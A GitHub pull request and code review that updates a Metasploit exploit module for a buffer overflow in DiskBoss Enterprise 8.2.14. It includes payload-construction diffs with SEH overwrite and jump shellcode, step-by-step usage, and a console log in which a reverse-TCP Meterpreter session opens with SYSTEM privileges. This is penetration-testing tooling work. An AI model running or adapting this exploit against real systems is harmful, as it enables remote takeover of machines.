### PR TITLE
Update DiskBoss Module (EDB 42395)

### PR DESCRIPTION
**Pull request by jrobles-r7**
Added a new target option for the
DiskBoss Server.

This is an MSF port of https://www.exploit-db.com/exploits/42395/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 8.2.14. The vulnerable application is available for download at https://www.exploit-db.com/apps/7e7d6455ada0833b6bf11167e43977df-diskbossent_setup_v8.2.14.exe.

## Verification
- [x] Start `DiskBoss Enterprise` service
- [x] Start `DiskBoss Enterprise` client application
- [x] Navigate to `Tools` > `DiskBoss Server Options` > `Server`
- [x] Check `Enable Web Server On Port 80` to start the web interface
- [x] Start `msfconsole`
- [x] Do `use exploit/windows/http/diskboss_get_bof`
- [x] Do `set rhost <target IP>`
- [x] Do `check`
- [x] Verify that the target is vulnerable
- [x] Do `set payload windows/meterpreter/reverse_tcp`
- [x] Do `set lhost <framework system IP>`
- [x] Do `run`
- [x] Verify that the Meterpreter session is opened

### CODE REVIEW

File: modules/exploits/windows/http/diskboss_get_bof.rb [hunk 1]
```diff
@@ -14,20 +14,23 @@ def initialize(info = {})
...
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'vportal',      # Vulnerability discovery and PoC
-          'Gabor Seljan'  # Metasploit module
+          'vportal',        # Vulnerability discovery and PoC
+          'Gabor Seljan',   # Metasploit module
+          'Ahmad Mahfouz',  # Vulnerability discovery and PoC
+          'Jacob Robles'    # Metasploit module
```
Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: I'd reorder to put your name next to Gabor's.

File: modules/exploits/windows/http/diskboss_get_bof.rb [hunk 2]
```diff
@@ -115,11 +127,22 @@ def exploit
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    sploit =  make_nops(21)
-    sploit << payload.encoded
-    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
-    sploit << [mytarget.ret].pack('V')
-    sploit << rand_text_alpha(2500)
+    if !(mytarget == targets[3])
```
Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: How about rewriting this to use positive logic?

```
if mytarget == targets[3]
  do_some_stuff
else
  do_some_other_stuff
end
```

File: modules/exploits/windows/http/diskboss_get_bof.rb [hunk 3]
```diff
@@ -115,11 +127,22 @@ def exploit
...
+      sploit << rand_text_alpha(2500)
+    else
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
+      sploit << rand_text_alpha(5000 - sploit.length)
+
```
Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: You can remove this extra newline when you refactor the `if/else`.

Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: Nix this newline when you refactor.

File: modules/exploits/windows/http/diskboss_get_bof.rb [hunk 4]
```diff
@@ -115,11 +127,22 @@ def exploit
...
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit << [mytarget.ret].pack('V')
+      sploit << rand_text_alpha(2500)
+    else
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
```
Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: How about `Rex::Arch::X86.jmp(0xffffbf25)` and document what the address is?

**Comment by pbarry-r7** [comment]
Verified fine for me:

```
$ ./msfconsole -q
msf > use exploit/windows/http/diskboss_get_bof
msf exploit(diskboss_get_bof) > set rhost 10.0.2.10
rhost => 10.0.2.10
msf exploit(diskboss_get_bof) > check
[+] 10.0.2.10:80 The target is vulnerable.
msf exploit(diskboss_get_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(diskboss_get_bof) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(diskboss_get_bof) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskBoss Enterprise v8.2.14
[*] Sending stage (179779 bytes) to 10.0.2.10
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.10:49294) at 2017-12-02 16:19:42 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Looks good and thanks, @jrobles-r7!  If you wouldn't mind updating the PR with @wvu-r7's feedback whenever is convenient, I can do one more quick verify and land.

**Comment by pbarry-r7** [comment]
I went ahead and made the requested review changes, all except updating the comment to reflect info about the address being JMP'd to.

File: modules/exploits/windows/http/diskboss_get_bof.rb [hunk 5]
```diff
@@ -127,21 +127,23 @@ def exploit
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    if !(mytarget == targets[3])
+    case mytarget
```
Comment (wvu-r7) [inline modules/exploits/windows/http/diskboss_get_bof.rb]: Even better!

File: modules/exploits/windows/http/diskboss_get_bof.rb (hunk 4 above)
Comment (pbarry-r7) [reply modules/exploits/windows/http/diskboss_get_bof.rb]: I took a note to look this up and add it later, will land for now.  Thx!

**Comment by pbarry-r7** [comment]
# Release Notes

This patch updates the DiskBoss Enterprise buffer overflow exploit module to also work with v8.2.14.

**Pull request merged**